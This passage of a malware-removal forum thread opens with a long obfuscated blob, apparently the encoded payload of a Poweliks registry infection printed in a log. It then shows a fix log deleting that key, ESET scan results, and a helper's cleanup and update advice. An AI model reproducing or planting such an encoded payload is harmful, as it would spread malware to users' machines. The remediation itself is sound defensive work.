8F(2tSIAV?U!X*GA(K0Ife`pD`93S}K4#jy9?tk1ICVxr](\+SyIj#N9fH+X}t!Sa\K4xNAIZ(s~dp`N5m..j}q1A5"V"Ij\V8FwrsVh]ow?\f"a}y,/jqFCeqaW8M"3U.Hg?Z,Z\^!jVN#.VIu]Z6A`jYt.swG#&4W:2owCqws#Ma4jqYBeqNs}Vjv[!^3:!e2p^3ymVT*GIFp0Netw9&mT.;4(wBPK"sIj4IP xCH(gBp`su]NAA]"^h}j46tMHD1qwAU2&qp`}AH8p"}s6s"".tVg]n2aMIF[ZCTa5nM4FjyIunw1}iixF 31X92oVr:9L9!\q5ZtFmV9;isF.5iN"HjxC\V\Fq3#W\sxI]:DC.ZwUe8.*}VOsPj8t"y4g. ALt!l5p`N!NjwU}s}}thtHpj46\Mw&5x]l#"wv}8 HAs$}y%\Ho^LPj^#\y4+.qw.2jPK`sop`.$}`9s"3s~Ijj$}jwZ53oAn3x&}.x9p`F$eZsx}pg|#K~G:jHV}A9."8#pqt IZqT}sF/:qw_x~i]!x/"MqMPsa(]:9]NZ}#}q*r6#wCHKjj"jsXp`Vs:.w-.^mq+VIp6As3"q}`5!9!CVa5`2OtP#`!iKx2K`s!}oNA}Vx&8MjPjK#Vj0.M`.^9lZ,jI8}Xes*mqV&Kjg] 2lXqV[|e+gCC95j:N]}^1.]ilK#3jBtM4V?^}/tMwp? wHI^./ ^tnqw_4C44]&4WqV^h}i9I#:aup tU `tw}+X2ej9 m:3XKNsA(Kw6jt/N8wC\VtA5Ts~+3g#}.\:3t.Cqj&#MX4KqYf]^HF]+w5^M^3ty#Z5jNAmjg.NAs6msNJC8m\d"VtjV\FPFx5U3q.#iWDP&^uHZjz]sYv]q9qiFwT53o54.}IUK^pjtBKqsp]sVk"3.A2l3\M4D5V[c\ x(PLwGI8}f VVWCoa:[!\C"Ft7jjt1"V^ujN.hHN.- `oh:!YG}.g/ij";sorChgq}ja*Nw.]e.Ac#sa(}:9%9FoV.q!6gxOHqN*pjN}]0smosjI.xo}j8p`3[?8owA#Lx!mVIo  }L838Ae.1q(:B_.^A}(Oj^N6HG1#]^1lj"b8pVaP jal\s[Zto^s}:lF1q1f}ZNpHVTy]K&TdF#\j`tjqKAIsI]0s/eyN.5fV\"$j.wAIjo2ii\.e.96m^2z6:s9#"`hPj9!j32$}^t|}2xPlA*%+qV/io}Am#9g.w/n:"sjxsL8P^*}jj!m2N]^Vwk 3xhijO\ [Aps6|":"ppsw3I:V+j:9Zt9t~?D!C2j?`jOIiVjfj.a".Z.4i`*M]%~2}j43q3BjIot?":w6pyIdI^.O#scX`#s~.:8!^ "(j3tV]hjfP!x!.^}XejtZJqwCi\55slj_Ik"Ca/ps664w3A]N2X`ic8jF1q8&y9!Hqn!j?\("!}A.i^Aj*esa(]xjo"!odpoVsjy^"^Hap09oP }Kj".SmVxd^Mjy"afe#jZJy"T1A9$[VsniixI^&92"xH~}2wA5?Df?oq-42}ttZ.y`iY2.2"snjg1j([9}P4&H2S*p2}9j.VA}PgA] ^*n!oxH_.l9XDfp`hA}8Ite2N\5"9:m&w3\jwnjM1DC#^ct!w .wVuHG9si3wI}j9]`jo~IA.x"sj$4Zs/5Zq-PwN}(iV"}!"GP:"(j.ow\+1c#9%pq9\ NIr]i^c jOo"s)Ml^q6"3gOp^s9powAeZ9A:3s~1!j38:1Dg31Ze+Xs]swFHVV\\wt.P+^ft2wH5FBj. HF`j&+Kq,3r`pT\AIs:3s~j^UjM^sI 1(]Vwx#3\/.:t3FZ*!t 9 \jgAU3#AHApD"Va!?`V"p:9J[ZY&:3s~ljjti?RyqfB|]iw5n:9HljVotsNlPo9V]jx\`s8jq/6`jx].:qA}2sPAs&Upt~p!4e\LI*\:1}8qxs62x 1GNuH`6AeV"h]jx;`!4yI`I6t34A4^w$|Z}J}2IqUI"plt^fjw"C[5\3aC}g.pZs}6wAtiiw/6s"j"V2Nm8s?tsjtpqN/j0FUt`1A" tj.3\$}jXv"(#1}P~Si!1*jqH"i:}KPVgxP.~]jy}M5sFf9!9XIN}$IAF2 0IsIi9xj^sj2wKt.#V 3x/j."-}H,G\Zs/Cs^(i:4U5jA.}2I3t 5"KwNtpqq"j IHqo}l539#8 xY`21CCTwCt3j*4V9G}s*3]+43}j4#:3H H`If9f~]G9F4wW-jq3!Uf1Kpj9 H2wA5x]L\qa;jj4FHwsG#`1D]o&y6.gCsGSKywcj3j$5UYB}2NPe 1r`i.~.jxF]fjyU[1}Uth 3I*N2t9#NIZP gj}j969:BD Al9!w$`N*}`N%}jILt%VD}24%}.^5U:a5]Tly .4HjqHz# wq]3g5ixgt"xH&52w.tFw3l.sHI`.6i^1Ig#s+Hf~B]2^f`V}6}T^Dj3w]IGAFj8I9\qgjPK"Hjso;j8..ts"i+G9pN`s]}stkU3*k5 lC8Mgy5.21#9g&}L~!pZ,3C2N1tTxfP3tA9!1jK09H`jAAqFBH06#j:1n5i9wKsjoHsx;jK#1}iZyPFjo1w93#:3hjqaq}g.`j2I}sV|q3wO.NtJ4AFFe.13t 12NFa#n:91q.sPTxKCCws.ZsenAY\ x?P:^}"CLHI`F}:.^Cpq6T}`6!\_1|\#.Apj9B}(\`3qxPVDMi9omAwd\_Ap]T\2 ?Dt5!O"?NAxDujwN6Nww9 oAAjTVsp"j#Mg(5.H/C+x(#(9BN8wXj^N/6oaCi:XC9(s"IoNxjsx+52tiNy6] `sx"#w&pL\hnL4/:Ms1i!gK}x4$?.A]n0I9#ut! s""jj42p`w!q3\f5N1s}_N]}s,lq ,.Ij&*]f4p}Mqf6!gVtf~$.0hzP`oy^P`6}jgJq2BSlysM9!w]IZ9*}2N]]^N9`/Ysm 93[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJXR*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I-SZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSH,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H%-6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+JH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH%\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\J"4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[rR\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\J&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJXR*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I-d!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfdX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX07rA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1ySH,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H%\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\dy4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9kR-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-S2N3S.m-6wbc`/%MS&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.SH%*pU%.JH,2dTp7S&I*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25-SZs}J25\9z,2SXRfJ!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSH,f];%&d"t5rsz-FXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H%-6A2\nz%7IZO3JXO }23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+JH,A`/,yS&1-[XR\gX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH%\9Tp71XR*if4pdXd\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\d"t~SXk-J!5\"Z0\[%4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9r%7p.z-[kO&d&^\J"1\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7S&93Jy1\}s)ci/RDJ&93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MSXR*}?RDdX12JT5\J&I*pU%.JH,2JT5\J&I*5?0MSH,2d!5-S25*pU%.JH,2dTp7S&I-J!wpd&e\[zO&JXRfSZs}J25\[zO&JXRfd!o5S25\9XOfSH%fSZs}J25\9z,2SXRfJXO&"Z0&J"4p6sz-|H,f];%&J"4p6sz-nX12I;%&dy4}rwb-|H,f];%&d"t5rsz-FXR\}23\FzR\]ZO3SH,+6A2\FzR\]ZO3dX1yrA2\nXR-I;,3SH,+6A2\nz%7IZO3JXO dX1Ai/O J&1-NH%-HH,Ai/O J&1-9X071H,A`ZO+S2m-NH%-HH,A`/,yS&1-[XR\gX0\[T5\HXR*jGt}JH/\[T5\HXR*`f45SH/\9!5-1H%*jGt}JH/\9Tp71XR*if4pdXd\J"4AJXk-SZp-];%\[%4AJXk-d!}7I;%\9L4$SH/-SZp-];%\9%t~SXk-J!5\"Z0\[rR\}.z-Nb,fJ2m\J"1\}.z-9k12S2m\dy1-pjb-Nb,fJ2m\d"m7p.z-[kO&d&^\J"1\J 93S.m-6wbci/RDJ&93dy^7rwbc`ZR.S2N3S.m-6wbc`/%MS&93J a&5#Z]i"A[!w(ps,o]`1Atig2HC^9m.oojA.Am!"GmAY3}2NJ]sNIIiI~1fx!C2wx:.oC}iwSj!xtKZNG8812[TwA]M9*".]GNyF|5jwp?Z9-jZV.[8.K\T9MK3wf^ ^Z`3Ok}iAhP3jU4Z.Gj:}|tTw(]2"f(!4S?`,C\!wJpyN-4j9!iosj5islK:4Bt(4ZqqptTxV#2AqK`YGt8s9tTw(j2wf`jH 4.tS\!wKIsw$l`I/82sq\T}_}!xfPj^2gM^\iigA}j83ps,4]yN}eijA[Fw35V#"NyN&j!"Gpos3pqNu]qtI\i} pK~9C2wSU3e!^igA}.\UINIu]AI}PTDAHM99\!sdI09&Ij\$1wsupqNaP0sxIi};NFw$}(&D"V$x\VlsHsx/psoTP092iP"y]4$51hpy6cj O2lG9BI`s9CAH!tVwG1(g([y4LIjtA}Tx2tC\\SZs$HqYl#qwr} D69:B!js6k(VwT.AN NjW"is,nmisk}sAAj!"I(!oA}iwA fxF4wWz8_.3]+4* V9!mF2I}ZsA"yw}VF6+qI9HqYk"fN~pjjdnVIX}KHrCsxIe ZXl^weP wA}ixX V4F9.2oN2w1\!w$p`s$4AFpio.|j3}MKM^#[!lC`:t|#3\D\!8/l`sU}`sA}iwA}jw$5.sgIsVA9Ca$qN\42Nuj`1A5is~pjw$}jwA5x]&#T^fH38/l`s+]As}tT^A}jw$5jo~p`sAUf9/qN\N2Nuj`HD:i9ap9$}jwA5joA}iwACg!l`s+C0s}tT^A[F9B5!o~p`sA5jw$p`s9} Npj`1A:i}ap95}V^xUjoA}iwA}jw$p`s\JZ9}tT^9[F9B5!#gIsVA\!w$p`s$p`s$}`2!IT}ap43}V^xU.s&#T^f}jw$p`s$}`sA}iw2[ 8B5![gIsVAmj"/qNBp`s$}`sA5is~pjg5}F^xU[&#T^fj!8!l`sU}`sA}iwA}jw$5.3W?sVAma/qNBp`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s3n09}tTap[F9B5!o~p`sAUM\/qNBp`s$}`ss9Ts~}!w$}jwA5Ft&#T^f}jw$p`sJ[09}tT^A}jw$5(s.IsVA\!w$p`s3NoNpj`1A5is~pjA-}F^xUjoA}iwAP:gFl`sU}`sA}ixr[ 8B5!o~p`sA5jw$p`s$p`s$}`sA5is~pjw$}.&XjL$j#"^Dts9*4w1u] .l]f4/i.w$5jow}V63"3xX5N96p^wui Vlq3*+pjjT]VjDgjtj]38*PMDjKjI$} .3]qxye3tqm B_NZsA5jxG}AmXmAs!twI1(9t+K0qC xC9!o.\!41#L~!jj1PHqYk]f9A}jw/jM]&?^I3U2a/p`}V?^I.8A,?jss839*^!wA5joK#"`h V4FNjwei0IL8i\;eKw BwI`s.(2x3.q6]HA6Oi 1k5is~pj\ \w(`3]L8#\Wt29 .wwe]Nsl#"`he.9!1!o_4_I}j "d5`N*NZ6Oi 1k5is~pjj68Fa(:xB.\q\!#s9!Ny1u#sY?8 Xy Vw/jViS.^1?jKjpKVFjmy9$}`sA"i*lV9!\sa.jx#38 X*eL&qNwwpH:AI8p4  Kx"5.ojj^NIj3xFKowBNjwun_1A5is~.8 8VAXCtL\s\H V4.pqqznV61nV^F 39*1!o~p`sItL^F5sFdHVsp] 1tquAkpj938!wA5joA]h9M8x9Bp`sB^2NAJTwX[!^+nF2XHZq!5(^\+`}9NA/*tZpcqp}x.Lw!j:^D`K#Z8+9sP.4eHs3Xe`6vF+4L}jw$5.4k429&UDoKo9]j`/X}o9*ju}d5&^4Pfxt2B|i95cH34e+j2TiA9Zj"~H[!4U"!0W? WF\(gup:t61G1fiA1S}3,njx\^LwF\!oA}iwA f"(?Vw}JH%\HT"h^(x2I3o p`s6n 9$p`s$pjN$#q1A\Ts~1Vwf}!wA5VtwFf^2H!xP?Zsd oW*Cq0Ftsw2UV]spZVAqSa|ZFCIb,f}jAW9iF;pjw/#sI!5LV\[TgS]2"FHAIB^A.1tT4AHVwi5K]~j`Y*"w3s}]pqVo\HY2gqwVSy"T6jgf9L]nJ+gpty\$p0s$}Z.*ijD|]x9o5joxpN3\9!g\?AIFHA2*j_9ZUit$SXR*i2wsIjB:th^Z}!w$pq3-[_w9PV4 6(gH5:];jZqFdy4(p`s$IGtBjAtx`is~pj^/\?O&UCBKHo~EtkDTIsm.P`I&tP4ftXD"5]A}A635 "\}A9 KVIijZqFdz%7p(99P:"25jBxe+"Zi3w$p:5*FZqFJ"T\}jw95xLSI`.A5jxu1 tupNj-6AIA5isAr2^}jswV9(2xF+t\iL"/rU,f}NAfijkyj2"\5Lt2._92"s~rs,"5ZF-jVW\9"t~pjA.\Vx:n!o3t%4Z}?O9K_mTiVN2Hoz!]fg]":2q}Zp :4u}y}+SZIf}`s35 w;1x9P]C9c:CB|H3&*J&9/HAIt^Z.1^T4\}3gedX12p`2 9Fw}N_N]+j9-\^Vs`i.~pjj4}kDc5jBAii&h f"TIbY9[0tWtu5hiOT}K4~jAtwjLg"l:2"1VVUCb,?\ht~Syz"^ ^A9 t3tjDS#MIfm0wB}N3\[Twp[M4f]~HwA!mFwXpq1(m09HjVNZ5p}\lKt"HM0hqC^\\oT!Cjxf1w9+6`5*PV"Wtyt"t2HxlAc\\XDH4o5fSH%.[Aw1}32Zj:IX\2`!12#1[UaCi:I*p`wh[ZsA}i"ZH2w "yt2+VFwtswX|2Vep`If}`2h\i1A1sT*]C^9tj#fi ^M[!4].yVf[2Vw\Pt!CKt"9 ^SGIZU.~up0.2?0I/6:2 \z/Hj:I.Ps"I\&B*]u\c]f"Bl;,+JH,5\pjHi:\G\(sN?`.A: Xi:j"rU%A^qp\\Pt~pjw$}jjA5joAP3xw}9$p`s/}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`sA5is~pjw$}jwA5joA}iwA}jw$p`s$}`sA}iwA}jw$5jo~p`sA5jw$p`s$p`s$}`2knPY(.^;[ftXqFqN(/"\^fZArHt8i2Vy[!jYJVxq(x]a4qjEUlT}o9-mw1s^ }wI+..S384^xgWIaN6%aCt("3}q6stys!ti\\^3\q(:HZlq,E`MO24 IsmboGty2om+.H4:jd\y&E\Ma/(o\w^x"q5q6}^s,!t g!F?SG\ }Tp;t45x^T}jY[(U68#`VE99HH(?X8#j^E9f\XpjX4#j^;NGHz 8FNFjzW !^;9s$Zm^!wn?02S0V;Ns,.tUo31/hX1KAA6ZShf}hJ/"\^Z0{|wYPno1!t ZEixj;9MsD}U*9(x"sms,Ajy.z[sVL\pH!Kwz^ 4t(sTv6V9V[2"s4V.UeoIV]hOX]xj;I&]a4y*p( ^;NV.z|;tUeUAF1+.HHy&;tMX/&2Ht8!X(ClV42N}^s,L}j0/FM9V&2)KZ9*9Mj8(j!dZ9X[V.4o#!kFjB8x5ytVT/ qj98x5"H^!d 8.98U5y\VZ2&Z4(?q*!`C"z(U32|U3;jq* (+Y^|Z"AJZ"hdf)/\/ShFKD15ysTeytGWPDVnM^TE#b*Jp+'mR";xvwQJ,kna,^+ -)mJ~ZSq#p81lOm4c#`8)Im^Wdnv#iVw0nAA==^#~@

HKEY_USERS\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\

========= End of Reg: =========

'HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32' => Key Deleted Successfully.
'HKU\S-1-5-21-165418536-3136176592-1450045568-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}' => Key deleted successfully.
'HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}' => Key deleted successfully.
'HKCR\CLSID\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}'=> Key not found.
'HKCU\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}' => Key deleted successfully.
'HKCR\CLSID\{bbbf3d02-0068-423f-8c68-0fd1c6e50b38}'=> Key not found.
C:\ProgramData\TEMP => ":359B3BDA" ADS removed successfully.
C:\ProgramData\TEMP => ":430C6D84" ADS removed successfully.
C:\ProgramData\TEMP => ":9A870F8B" ADS removed successfully.
C:\ProgramData\TEMP => ":A8ADE5D8" ADS removed successfully.
C:\ProgramData\TEMP => ":C7DEC6B7" ADS removed successfully.
C:\ProgramData\TEMP => ":DFC5A2B2" ADS removed successfully.

The system needed a reboot.

==== End of Fixlog ====

 

ESET log:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=6185376a08c4154ca049fa11639aef7a
# engine=19301
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-07-23 02:41:32
# local_time=2014-07-22 07:41:32 (-0800, Pacific Daylight Time)
# country="United States"
# lang=1033
# osver=6.0.6002 NT Service Pack 2
# compatibility_mode_1='AVG Anti-Virus Free Edition 2012'
# compatibility_mode=1035 16777213 100 83 0 94789702 0 0
# compatibility_mode_1='Microsoft Security Essentials'
# compatibility_mode=5894 16777213 100 100 89685442 102838962 0 0
# scanned=297257
# found=7
# cleaned=0
# scan_time=5949
sh=67197C0ADB63091138587B423A56438F366B05AD ft=0 fh=0000000000000000 vn="HTML/Iframe.B.Gen virus" ac=I fn="C:\Users\MikeandBert\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\UO0GVSUK\index[1].htm"
sh=7AC7E15D320F791344ABD5F8FF39F60E217A3867 ft=1 fh=155cc23c692c8ec9 vn="a variant of Win32/ExpressFiles potentially unwanted application" ac=I fn="D:\justin\Adobe_Photoshop_CS5_Classroom_in_a_Book_downloader_2502b.exe"
sh=7AC7E15D320F791344ABD5F8FF39F60E217A3867 ft=1 fh=155cc23c692c8ec9 vn="a variant of Win32/ExpressFiles potentially unwanted application" ac=I fn="D:\justin\Photography_and_Photoshop_Tutorials_Collection_Part_1_downloader_2502b.exe"
sh=5F3CB7125199AD0D6A41D4DD0C08E6A759E92CF9 ft=1 fh=6ac152fe2b2740a4 vn="Win32/Toolbar.Conduit potentially unwanted application" ac=I fn="D:\justin\zaSetupWeb_102_047_000_en.exe"
sh=57F8B537383C4139A55E3C707CC9A0130D7D6597 ft=1 fh=44391568d75e01d7 vn="Win32/Toolbar.Conduit potentially unwanted application" ac=I fn="D:\justin\desktop\New Folder\zaSetupWeb_102_034_000_en.exe"
sh=E0B37C57E99FE566CE70DE1FE6B0A8E222BC133A ft=1 fh=040dd3f1fe168480 vn="Win32/Somoto.F potentially unwanted application" ac=I fn="D:\Program Files\Vuze\.install4j\i4j_extf_20_5p83tu.exe"
sh=0AC76F0DCEC5A2957E9135A82012933D40AC6A63 ft=1 fh=f9c9bf4621013cb3 vn="a variant of Win32/Bunndle potentially unsafe application" ac=I fn="D:\Program Files\Vuze\.install4j\i4j_extf_32_5p83tu.dll"
 



#10 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 23 July 2014 - 03:02 PM

This is looking good! No more active malware has been found.


The author of Combofix has asked to upload some files so that he can analyze why Combofix didn't delete this infection and improve the detection. Thank you in advance for providing them as follows:
  • Please go to the directory C:\WINDOWS\erdnt\Hiv-backup.
  • Pack the folder Users to a zip archive (right click on it and choose Send to -> Compressed (zipped) folder).
  • Click here to upload this zip file to the author of Combofix:
    • Copy-paste the link to your topic into the respective text box.
    • Click on 'Browse', find and select the zip file you've just created and click 'Open'.
    • Write "Poweliks - User Hives" into the comments textbox.
    • Click on 'Send File'


That's it! Your logs look clean to me at the moment.
We're gonna clean up everything now, close security holes on your computer and in the end I'll provide you with a list of security tips so you hopefully will not need our help anymore in the future.


My help is free for everybody.
If you want to support me fighting against malware or buy me a beer for the assistance you received, then you can consider a donation: btn_donate_SM.gif.
Thank you!



Clean Up

Now we remove all the tools we used (including their logs and quarantine folders), restore your settings and delete old and infected system restorepoints:
  • You can uninstall programs that you had to install (e.g. MBAM or ESET Onlinescanner) in the control panel if you so wish.
  • Rename Combofix.exe in Uninstall.exe and execute it with a double click. (Beware that file extensions might be hidden. So don't add a double extension Uninstall.exe.exe.)
  • Download DelFix (by Xplode) and save it to your Desktop.
    • Close all running programs and start delfix.exe.
    • Make sure that all available options are checked.
    • Click on Run
    • DelFix should remove all our tools and delete itself afterwards. I don't need the log file.
  • If there is still something left you can delete it manually.


Closing security holes

Many infections happen via drive-by downloads that run unnoticed in the background while the user visits an infected website. To achieve this malware exploits security holes in installed software (e.g. browser or its plugins). Older versions of such software often have lots of known exploitable holes. Therefor it's very important to always keep your software up-to-date.
The following software is outdated. Make sure you remove all old versions and install the current one instead if you need the program:

Adobe Reader X (10.1.2)
Java 6 Update 26
Java 6 Update 5
Mozilla Firefox 12.0
Opera 11.64




Tips

I recommend to read and follow the "16 simple and easy ways to keep your computer safe and secure on the Internet" (Link) by Lawrence Abrams.

#11 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:01:18 AM

Posted 03 September 2014 - 06:30 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users